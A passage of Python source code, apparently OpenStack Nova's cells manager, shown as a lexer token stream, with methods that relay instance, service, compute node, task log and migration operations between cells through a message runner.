op|'.'
name|'instances_to_heal'
op|'='
name|'cells_utils'
op|'.'
name|'get_instances_to_sync'
op|'('
nl|'\n'
name|'ctxt'
op|','
name|'updated_since'
op|'='
name|'updated_since'
op|','
name|'shuffle'
op|'='
name|'True'
op|','
nl|'\n'
name|'uuids_only'
op|'='
name|'True'
op|')'
newline|'\n'
name|'info'
op|'['
string|"'updated_list'"
op|']'
op|'='
name|'True'
newline|'\n'
name|'try'
op|':'
newline|'\n'
indent|' '
name|'instance'
op|'='
name|'next'
op|'('
name|'self'
op|'.'
name|'instances_to_heal'
op|')'
newline|'\n'
dedent|''
name|'except'
name|'StopIteration'
op|':'
newline|'\n'
indent|' '
name|'return'
newline|'\n'
dedent|''
dedent|''
name|'return'
name|'instance'
newline|'\n'
nl|'\n'
dedent|''
name|'rd_context'
op|'='
name|'ctxt'
op|'.'
name|'elevated'
op|'('
name|'read_deleted'
op|'='
string|"'yes'"
op|')'
newline|'\n'
nl|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
name|'CONF'
op|'.'
name|'cells'
op|'.'
name|'instance_update_num_instances'
op|')'
op|':'
newline|'\n'
indent|' '
name|'while'
name|'True'
op|':'
newline|'\n'
comment|'# Yield to other greenthreads'
nl|'\n'
indent|' '
name|'time'
op|'.'
name|'sleep'
op|'('
number|'0'
op|')'
newline|'\n'
name|'instance_uuid'
op|'='
name|'_next_instance'
op|'('
op|')'
newline|'\n'
name|'if'
name|'not'
name|'instance_uuid'
op|':'
newline|'\n'
indent|' '
name|'return'
newline|'\n'
dedent|''
name|'try'
op|':'
newline|'\n'
indent|' '
name|'instance'
op|'='
name|'objects'
op|'.'
name|'Instance'
op|'.'
name|'get_by_uuid'
op|'('
name|'rd_context'
op|','
nl|'\n'
name|'instance_uuid'
op|')'
newline|'\n'
dedent|''
name|'except'
name|'exception'
op|'.'
name|'InstanceNotFound'
op|':'
newline|'\n'
indent|' '
name|'continue'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'_sync_instance'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
name|'break'
newline|'\n'
nl|'\n'
DECL|member|_sync_instance
dedent|''
dedent|''
dedent|''
name|'def'
name|'_sync_instance'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Broadcast an instance_update or instance_destroy message up to\n parent cells.\n """'
newline|'\n'
name|'if'
name|'instance'
op|'.'
name|'deleted'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'instance_destroy_at_top'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'instance_update_at_top'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|build_instances
dedent|''
dedent|''
name|'def'
name|'build_instances'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'build_inst_kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Pick a cell (possibly ourselves) to build new instance(s) and\n forward the request accordingly.\n """'
newline|'\n'
comment|'# Target is ourselves first.'
nl|'\n'
name|'filter_properties'
op|'='
name|'build_inst_kwargs'
op|'.'
name|'get'
op|'('
string|"'filter_properties'"
op|')'
newline|'\n'
name|'if'
op|'('
name|'filter_properties'
name|'is'
name|'not'
name|'None'
name|'and'
nl|'\n'
name|'not'
name|'isinstance'
op|'('
name|'filter_properties'
op|'['
string|"'instance_type'"
op|']'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'Flavor'
op|')'
op|')'
op|':'
newline|'\n'
comment|'# NOTE(danms): Handle pre-1.30 build_instances() call. Remove me'
nl|'\n'
comment|'# when we bump the RPC API version to 2.0.'
nl|'\n'
indent|' '
name|'flavor'
op|'='
name|'objects'
op|'.'
name|'Flavor'
op|'('
op|'**'
name|'filter_properties'
op|'['
string|"'instance_type'"
op|']'
op|')'
newline|'\n'
name|'build_inst_kwargs'
op|'['
string|"'filter_properties'"
op|']'
op|'='
name|'dict'
op|'('
nl|'\n'
name|'filter_properties'
op|','
name|'instance_type'
op|'='
name|'flavor'
op|')'
newline|'\n'
dedent|''
name|'instances'
op|'='
name|'build_inst_kwargs'
op|'['
string|"'instances'"
op|']'
newline|'\n'
name|'if'
name|'not'
name|'isinstance'
op|'('
name|'instances'
op|'['
number|'0'
op|']'
op|','
name|'objects'
op|'.'
name|'Instance'
op|')'
op|':'
newline|'\n'
comment|'# NOTE(danms): Handle pre-1.32 build_instances() call. Remove me'
nl|'\n'
comment|'# when we bump the RPC API version to 2.0'
nl|'\n'
indent|' '
name|'build_inst_kwargs'
op|'['
string|"'instances'"
op|']'
op|'='
name|'instance_obj'
op|'.'
name|'_make_instance_list'
op|'('
nl|'\n'
name|'ctxt'
op|','
name|'objects'
op|'.'
name|'InstanceList'
op|'('
op|')'
op|','
name|'instances'
op|','
op|'['
string|"'system_metadata'"
op|','
nl|'\n'
string|"'metadata'"
op|']'
op|')'
newline|'\n'
dedent|''
name|'our_cell'
op|'='
name|'self'
op|'.'
name|'state_manager'
op|'.'
name|'get_my_state'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'build_instances'
op|'('
name|'ctxt'
op|','
name|'our_cell'
op|','
name|'build_inst_kwargs'
op|')'
newline|'\n'
nl|'\n'
DECL|member|get_cell_info_for_neighbors
dedent|''
name|'def'
name|'get_cell_info_for_neighbors'
op|'('
name|'self'
op|','
name|'_ctxt'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Return cell information for our neighbor cells."""'
newline|'\n'
name|'return'
name|'self'
op|'.'
name|'state_manager'
op|'.'
name|'get_cell_info_for_neighbors'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|run_compute_api_method
dedent|''
name|'def'
name|'run_compute_api_method'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'cell_name'
op|','
name|'method_info'
op|','
name|'call'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Call a compute API method in a specific cell."""'
newline|'\n'
name|'response'
op|'='
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'run_compute_api_method'
op|'('
name|'ctxt'
op|','
nl|'\n'
name|'cell_name'
op|','
nl|'\n'
name|'method_info'
op|','
nl|'\n'
name|'call'
op|')'
newline|'\n'
name|'if'
name|'call'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'response'
op|'.'
name|'value_or_raise'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|instance_update_at_top
dedent|''
dedent|''
name|'def'
name|'instance_update_at_top'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Update an instance at the top level cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'instance_update_at_top'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|instance_destroy_at_top
dedent|''
name|'def'
name|'instance_destroy_at_top'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Destroy an instance at the top level cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'instance_destroy_at_top'
op|'('
name|'ctxt'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|instance_delete_everywhere
dedent|''
name|'def'
name|'instance_delete_everywhere'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|','
name|'delete_type'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""This is used by API cell when it didn\'t know what cell\n an instance was in, but the instance was requested to be\n deleted or soft_deleted. So, we\'ll broadcast this everywhere.\n """'
newline|'\n'
name|'if'
name|'isinstance'
op|'('
name|'instance'
op|','
name|'dict'
op|')'
op|':'
newline|'\n'
indent|' '
name|'instance'
op|'='
name|'objects'
op|'.'
name|'Instance'
op|'.'
name|'_from_db_object'
op|'('
name|'ctxt'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'Instance'
op|'('
op|')'
op|','
name|'instance'
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'instance_delete_everywhere'
op|'('
name|'ctxt'
op|','
name|'instance'
op|','
nl|'\n'
name|'delete_type'
op|')'
newline|'\n'
nl|'\n'
DECL|member|instance_fault_create_at_top
dedent|''
name|'def'
name|'instance_fault_create_at_top'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance_fault'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Create an instance fault at the top level cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'instance_fault_create_at_top'
op|'('
name|'ctxt'
op|','
name|'instance_fault'
op|')'
newline|'\n'
nl|'\n'
DECL|member|bw_usage_update_at_top
dedent|''
name|'def'
name|'bw_usage_update_at_top'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'bw_update_info'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Update bandwidth usage at top level cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'bw_usage_update_at_top'
op|'('
name|'ctxt'
op|','
name|'bw_update_info'
op|')'
newline|'\n'
nl|'\n'
DECL|member|sync_instances
dedent|''
name|'def'
name|'sync_instances'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'project_id'
op|','
name|'updated_since'
op|','
name|'deleted'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Force a sync of all instances, potentially by project_id,\n and potentially since a certain date/time.\n """'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'sync_instances'
op|'('
name|'ctxt'
op|','
name|'project_id'
op|','
name|'updated_since'
op|','
nl|'\n'
name|'deleted'
op|')'
newline|'\n'
nl|'\n'
DECL|member|service_get_all
dedent|''
name|'def'
name|'service_get_all'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'filters'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Return services in this cell and in all child cells."""'
newline|'\n'
name|'responses'
op|'='
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'service_get_all'
op|'('
name|'ctxt'
op|','
name|'filters'
op|')'
newline|'\n'
name|'ret_services'
op|'='
op|'['
op|']'
newline|'\n'
comment|'# 1 response per cell. Each response is a list of services.'
nl|'\n'
name|'for'
name|'response'
name|'in'
name|'responses'
op|':'
newline|'\n'
indent|' '
name|'services'
op|'='
name|'response'
op|'.'
name|'value_or_raise'
op|'('
op|')'
newline|'\n'
name|'for'
name|'service'
name|'in'
name|'services'
op|':'
newline|'\n'
indent|' '
name|'service'
op|'='
name|'cells_utils'
op|'.'
name|'add_cell_to_service'
op|'('
nl|'\n'
name|'service'
op|','
name|'response'
op|'.'
name|'cell_name'
op|')'
newline|'\n'
name|'ret_services'
op|'.'
name|'append'
op|'('
name|'service'
op|')'
newline|'\n'
dedent|''
dedent|''
name|'return'
name|'ret_services'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'oslo_messaging'
op|'.'
name|'expected_exceptions'
op|'('
name|'exception'
op|'.'
name|'CellRoutingInconsistency'
op|')'
newline|'\n'
DECL|member|service_get_by_compute_host
name|'def'
name|'service_get_by_compute_host'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'host_name'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Return a service entry for a compute host in a certain cell."""'
newline|'\n'
name|'cell_name'
op|','
name|'host_name'
op|'='
name|'cells_utils'
op|'.'
name|'split_cell_and_item'
op|'('
name|'host_name'
op|')'
newline|'\n'
name|'response'
op|'='
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'service_get_by_compute_host'
op|'('
name|'ctxt'
op|','
nl|'\n'
name|'cell_name'
op|','
nl|'\n'
name|'host_name'
op|')'
newline|'\n'
name|'service'
op|'='
name|'response'
op|'.'
name|'value_or_raise'
op|'('
op|')'
newline|'\n'
name|'service'
op|'='
name|'cells_utils'
op|'.'
name|'add_cell_to_service'
op|'('
name|'service'
op|','
name|'response'
op|'.'
name|'cell_name'
op|')'
newline|'\n'
name|'return'
name|'service'
newline|'\n'
nl|'\n'
DECL|member|get_host_uptime
dedent|''
name|'def'
name|'get_host_uptime'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'host_name'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Return host uptime for a compute host in a certain cell\n\n :param host_name: fully qualified hostname. It should be in format of\n parent!child@host_id\n """'
newline|'\n'
name|'cell_name'
op|','
name|'host_name'
op|'='
name|'cells_utils'
op|'.'
name|'split_cell_and_item'
op|'('
name|'host_name'
op|')'
newline|'\n'
name|'response'
op|'='
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'get_host_uptime'
op|'('
name|'ctxt'
op|','
name|'cell_name'
op|','
nl|'\n'
name|'host_name'
op|')'
newline|'\n'
name|'return'
name|'response'
op|'.'
name|'value_or_raise'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|service_update
dedent|''
name|'def'
name|'service_update'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'host_name'
op|','
name|'binary'
op|','
name|'params_to_update'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Used to enable/disable a service. For compute services, setting to\n disabled stops new builds arriving on that host.\n\n :param host_name: the name of the host machine that the service is\n running\n :param binary: The name of the executable that the service runs as\n :param params_to_update: eg. {\'disabled\': True}\n :returns: the service reference\n """'
newline|'\n'
name|'cell_name'
op|','
name|'host_name'
op|'='
name|'cells_utils'
op|'.'
name|'split_cell_and_item'
op|'('
name|'host_name'
op|')'
newline|'\n'
name|'response'
op|'='
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'service_update'
op|'('
nl|'\n'
name|'ctxt'
op|','
name|'cell_name'
op|','
name|'host_name'
op|','
name|'binary'
op|','
name|'params_to_update'
op|')'
newline|'\n'
name|'service'
op|'='
name|'response'
op|'.'
name|'value_or_raise'
op|'('
op|')'
newline|'\n'
name|'service'
op|'='
name|'cells_utils'
op|'.'
name|'add_cell_to_service'
op|'('
name|'service'
op|','
name|'response'
op|'.'
name|'cell_name'
op|')'
newline|'\n'
name|'return'
name|'service'
newline|'\n'
nl|'\n'
DECL|member|service_delete
dedent|''
name|'def'
name|'service_delete'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'cell_service_id'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Deletes the specified service."""'
newline|'\n'
name|'cell_name'
op|','
name|'service_id'
op|'='
name|'cells_utils'
op|'.'
name|'split_cell_and_item'
op|'('
nl|'\n'
name|'cell_service_id'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'service_delete'
op|'('
name|'ctxt'
op|','
name|'cell_name'
op|','
name|'service_id'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'oslo_messaging'
op|'.'
name|'expected_exceptions'
op|'('
name|'exception'
op|'.'
name|'CellRoutingInconsistency'
op|')'
newline|'\n'
DECL|member|proxy_rpc_to_manager
name|'def'
name|'proxy_rpc_to_manager'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'topic'
op|','
name|'rpc_message'
op|','
name|'call'
op|','
name|'timeout'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Proxy an RPC message as-is to a manager."""'
newline|'\n'
name|'compute_topic'
op|'='
name|'CONF'
op|'.'
name|'compute_topic'
newline|'\n'
name|'cell_and_host'
op|'='
name|'topic'
op|'['
name|'len'
op|'('
name|'compute_topic'
op|')'
op|'+'
number|'1'
op|':'
op|']'
newline|'\n'
name|'cell_name'
op|','
name|'host_name'
op|'='
name|'cells_utils'
op|'.'
name|'split_cell_and_item'
op|'('
name|'cell_and_host'
op|')'
newline|'\n'
name|'response'
op|'='
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'proxy_rpc_to_manager'
op|'('
name|'ctxt'
op|','
name|'cell_name'
op|','
nl|'\n'
name|'host_name'
op|','
name|'topic'
op|','
name|'rpc_message'
op|','
name|'call'
op|','
name|'timeout'
op|')'
newline|'\n'
name|'return'
name|'response'
op|'.'
name|'value_or_raise'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|task_log_get_all
dedent|''
name|'def'
name|'task_log_get_all'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'task_name'
op|','
name|'period_beginning'
op|','
nl|'\n'
name|'period_ending'
op|','
name|'host'
op|'='
name|'None'
op|','
name|'state'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Get task logs from the DB from all cells or a particular\n cell.\n\n If \'host\' is not None, host will be of the format \'cell!name@host\',\n with \'@host\' being optional. The query will be directed to the\n appropriate cell and return all task logs, or task logs matching\n the host if specified.\n\n \'state\' also may be None. If it\'s not, filter by the state as well.\n """'
newline|'\n'
name|'if'
name|'host'
name|'is'
name|'None'
op|':'
newline|'\n'
indent|' '
name|'cell_name'
op|'='
name|'None'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'cell_name'
op|','
name|'host'
op|'='
name|'cells_utils'
op|'.'
name|'split_cell_and_item'
op|'('
name|'host'
op|')'
newline|'\n'
comment|'# If no cell name was given, assume that the host name is the'
nl|'\n'
comment|'# cell_name and that the target is all hosts'
nl|'\n'
name|'if'
name|'cell_name'
name|'is'
name|'None'
op|':'
newline|'\n'
indent|' '
name|'cell_name'
op|','
name|'host'
op|'='
name|'host'
op|','
name|'cell_name'
newline|'\n'
dedent|''
dedent|''
name|'responses'
op|'='
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'task_log_get_all'
op|'('
name|'ctxt'
op|','
name|'cell_name'
op|','
nl|'\n'
name|'task_name'
op|','
name|'period_beginning'
op|','
name|'period_ending'
op|','
nl|'\n'
name|'host'
op|'='
name|'host'
op|','
name|'state'
op|'='
name|'state'
op|')'
newline|'\n'
comment|'# 1 response per cell. Each response is a list of task log'
nl|'\n'
comment|'# entries.'
nl|'\n'
name|'ret_task_logs'
op|'='
op|'['
op|']'
newline|'\n'
name|'for'
name|'response'
name|'in'
name|'responses'
op|':'
newline|'\n'
indent|' '
name|'task_logs'
op|'='
name|'response'
op|'.'
name|'value_or_raise'
op|'('
op|')'
newline|'\n'
name|'for'
name|'task_log'
name|'in'
name|'task_logs'
op|':'
newline|'\n'
indent|' '
name|'cells_utils'
op|'.'
name|'add_cell_to_task_log'
op|'('
name|'task_log'
op|','
nl|'\n'
name|'response'
op|'.'
name|'cell_name'
op|')'
newline|'\n'
name|'ret_task_logs'
op|'.'
name|'append'
op|'('
name|'task_log'
op|')'
newline|'\n'
dedent|''
dedent|''
name|'return'
name|'ret_task_logs'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'oslo_messaging'
op|'.'
name|'expected_exceptions'
op|'('
name|'exception'
op|'.'
name|'CellRoutingInconsistency'
op|')'
newline|'\n'
DECL|member|compute_node_get
name|'def'
name|'compute_node_get'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'compute_id'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Get a compute node by ID in a specific cell."""'
newline|'\n'
name|'cell_name'
op|','
name|'compute_id'
op|'='
name|'cells_utils'
op|'.'
name|'split_cell_and_item'
op|'('
nl|'\n'
name|'compute_id'
op|')'
newline|'\n'
name|'response'
op|'='
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'compute_node_get'
op|'('
name|'ctxt'
op|','
name|'cell_name'
op|','
nl|'\n'
name|'compute_id'
op|')'
newline|'\n'
name|'node'
op|'='
name|'response'
op|'.'
name|'value_or_raise'
op|'('
op|')'
newline|'\n'
name|'node'
op|'='
name|'cells_utils'
op|'.'
name|'add_cell_to_compute_node'
op|'('
name|'node'
op|','
name|'cell_name'
op|')'
newline|'\n'
name|'return'
name|'node'
newline|'\n'
nl|'\n'
DECL|member|compute_node_get_all
dedent|''
name|'def'
name|'compute_node_get_all'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'hypervisor_match'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Return list of compute nodes in all cells."""'
newline|'\n'
name|'responses'
op|'='
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'compute_node_get_all'
op|'('
name|'ctxt'
op|','
nl|'\n'
name|'hypervisor_match'
op|'='
name|'hypervisor_match'
op|')'
newline|'\n'
comment|'# 1 response per cell. Each response is a list of compute_node'
nl|'\n'
comment|'# entries.'
nl|'\n'
name|'ret_nodes'
op|'='
op|'['
op|']'
newline|'\n'
name|'for'
name|'response'
name|'in'
name|'responses'
op|':'
newline|'\n'
indent|' '
name|'nodes'
op|'='
name|'response'
op|'.'
name|'value_or_raise'
op|'('
op|')'
newline|'\n'
name|'for'
name|'node'
name|'in'
name|'nodes'
op|':'
newline|'\n'
indent|' '
name|'node'
op|'='
name|'cells_utils'
op|'.'
name|'add_cell_to_compute_node'
op|'('
name|'node'
op|','
nl|'\n'
name|'response'
op|'.'
name|'cell_name'
op|')'
newline|'\n'
name|'ret_nodes'
op|'.'
name|'append'
op|'('
name|'node'
op|')'
newline|'\n'
dedent|''
dedent|''
name|'return'
name|'ret_nodes'
newline|'\n'
nl|'\n'
DECL|member|compute_node_stats
dedent|''
name|'def'
name|'compute_node_stats'
op|'('
name|'self'
op|','
name|'ctxt'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Return compute node stats totals from all cells."""'
newline|'\n'
name|'responses'
op|'='
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'compute_node_stats'
op|'('
name|'ctxt'
op|')'
newline|'\n'
name|'totals'
op|'='
op|'{'
op|'}'
newline|'\n'
name|'for'
name|'response'
name|'in'
name|'responses'
op|':'
newline|'\n'
indent|' '
name|'data'
op|'='
name|'response'
op|'.'
name|'value_or_raise'
op|'('
op|')'
newline|'\n'
name|'for'
name|'key'
op|','
name|'val'
name|'in'
name|'six'
op|'.'
name|'iteritems'
op|'('
name|'data'
op|')'
op|':'
newline|'\n'
indent|' '
name|'totals'
op|'.'
name|'setdefault'
op|'('
name|'key'
op|','
number|'0'
op|')'
newline|'\n'
name|'totals'
op|'['
name|'key'
op|']'
op|'+='
name|'val'
newline|'\n'
dedent|''
dedent|''
name|'return'
name|'totals'
newline|'\n'
nl|'\n'
DECL|member|actions_get
dedent|''
name|'def'
name|'actions_get'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'cell_name'
op|','
name|'instance_uuid'
op|')'
op|':'
newline|'\n'
indent|' '
name|'response'
op|'='
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'actions_get'
op|'('
name|'ctxt'
op|','
name|'cell_name'
op|','
name|'instance_uuid'
op|')'
newline|'\n'
name|'return'
name|'response'
op|'.'
name|'value_or_raise'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|action_get_by_request_id
dedent|''
name|'def'
name|'action_get_by_request_id'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'cell_name'
op|','
name|'instance_uuid'
op|','
nl|'\n'
name|'request_id'
op|')'
op|':'
newline|'\n'
indent|' '
name|'response'
op|'='
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'action_get_by_request_id'
op|'('
name|'ctxt'
op|','
name|'cell_name'
op|','
nl|'\n'
name|'instance_uuid'
op|','
nl|'\n'
name|'request_id'
op|')'
newline|'\n'
name|'return'
name|'response'
op|'.'
name|'value_or_raise'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|action_events_get
dedent|''
name|'def'
name|'action_events_get'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'cell_name'
op|','
name|'action_id'
op|')'
op|':'
newline|'\n'
indent|' '
name|'response'
op|'='
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'action_events_get'
op|'('
name|'ctxt'
op|','
name|'cell_name'
op|','
nl|'\n'
name|'action_id'
op|')'
newline|'\n'
name|'return'
name|'response'
op|'.'
name|'value_or_raise'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|consoleauth_delete_tokens
dedent|''
name|'def'
name|'consoleauth_delete_tokens'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance_uuid'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Delete consoleauth tokens for an instance in API cells."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'consoleauth_delete_tokens'
op|'('
name|'ctxt'
op|','
name|'instance_uuid'
op|')'
newline|'\n'
nl|'\n'
DECL|member|validate_console_port
dedent|''
name|'def'
name|'validate_console_port'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance_uuid'
op|','
name|'console_port'
op|','
nl|'\n'
name|'console_type'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Validate console port with child cell compute node."""'
newline|'\n'
name|'instance'
op|'='
name|'objects'
op|'.'
name|'Instance'
op|'.'
name|'get_by_uuid'
op|'('
name|'ctxt'
op|','
name|'instance_uuid'
op|')'
newline|'\n'
name|'if'
name|'not'
name|'instance'
op|'.'
name|'cell_name'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceUnknownCell'
op|'('
name|'instance_uuid'
op|'='
name|'instance_uuid'
op|')'
newline|'\n'
dedent|''
name|'response'
op|'='
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'validate_console_port'
op|'('
name|'ctxt'
op|','
nl|'\n'
name|'instance'
op|'.'
name|'cell_name'
op|','
name|'instance_uuid'
op|','
name|'console_port'
op|','
nl|'\n'
name|'console_type'
op|')'
newline|'\n'
name|'return'
name|'response'
op|'.'
name|'value_or_raise'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|get_capacities
dedent|''
name|'def'
name|'get_capacities'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'cell_name'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'self'
op|'.'
name|'state_manager'
op|'.'
name|'get_capacities'
op|'('
name|'cell_name'
op|')'
newline|'\n'
nl|'\n'
DECL|member|bdm_update_or_create_at_top
dedent|''
name|'def'
name|'bdm_update_or_create_at_top'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'bdm'
op|','
name|'create'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""BDM was created/updated in this cell. Tell the API cells."""'
newline|'\n'
comment|'# TODO(ndipanov): Move inter-cell RPC to use objects'
nl|'\n'
name|'bdm'
op|'='
name|'base_obj'
op|'.'
name|'obj_to_primitive'
op|'('
name|'bdm'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'bdm_update_or_create_at_top'
op|'('
name|'ctxt'
op|','
name|'bdm'
op|','
name|'create'
op|'='
name|'create'
op|')'
newline|'\n'
nl|'\n'
DECL|member|bdm_destroy_at_top
dedent|''
name|'def'
name|'bdm_destroy_at_top'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance_uuid'
op|','
name|'device_name'
op|'='
name|'None'
op|','
nl|'\n'
name|'volume_id'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""BDM was destroyed for instance in this cell. Tell the API cells."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'bdm_destroy_at_top'
op|'('
name|'ctxt'
op|','
name|'instance_uuid'
op|','
nl|'\n'
name|'device_name'
op|'='
name|'device_name'
op|','
nl|'\n'
name|'volume_id'
op|'='
name|'volume_id'
op|')'
newline|'\n'
nl|'\n'
DECL|member|get_migrations
dedent|''
name|'def'
name|'get_migrations'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'filters'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Fetch migrations applying the filters."""'
newline|'\n'
name|'target_cell'
op|'='
name|'None'
newline|'\n'
name|'if'
string|'"cell_name"'
name|'in'
name|'filters'
op|':'
newline|'\n'
indent|' '
name|'_path_cell_sep'
op|'='
name|'cells_utils'
op|'.'
name|'PATH_CELL_SEP'
newline|'\n'
name|'target_cell'
op|'='
string|"'%s%s%s'"
op|'%'
op|'('
name|'CONF'
op|'.'
name|'cells'
op|'.'
name|'name'
op|','
name|'_path_cell_sep'
op|','
nl|'\n'
name|'filters'
op|'['
string|"'cell_name'"
op|']'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'responses'
op|'='
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'get_migrations'
op|'('
name|'ctxt'
op|','
name|'target_cell'
op|','
nl|'\n'
name|'False'
op|','
name|'filters'
op|')'
newline|'\n'
name|'migrations'
op|'='
op|'['
op|']'
newline|'\n'
name|'for'
name|'response'
name|'in'
name|'responses'
op|':'
newline|'\n'
indent|' '
name|'migrations'
op|'+='
name|'response'
op|'.'
name|'value_or_raise'
op|'('
op|')'
newline|'\n'
dedent|''
name|'return'
name|'migrations'
newline|'\n'
nl|'\n'
DECL|member|instance_update_from_api
dedent|''
name|'def'
name|'instance_update_from_api'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'instance'
op|','
name|'expected_vm_state'
op|','
nl|'\n'
name|'expected_task_state'
op|','
name|'admin_state_reset'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Update an instance in its cell."""'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'instance_update_from_api'
op|'('
name|'ctxt'
op|','
name|'instance'
op|','
nl|'\n'
name|'expected_vm_state'
op|','
nl|'\n'
name|'expected_task_state'
op|','
nl|'\n'
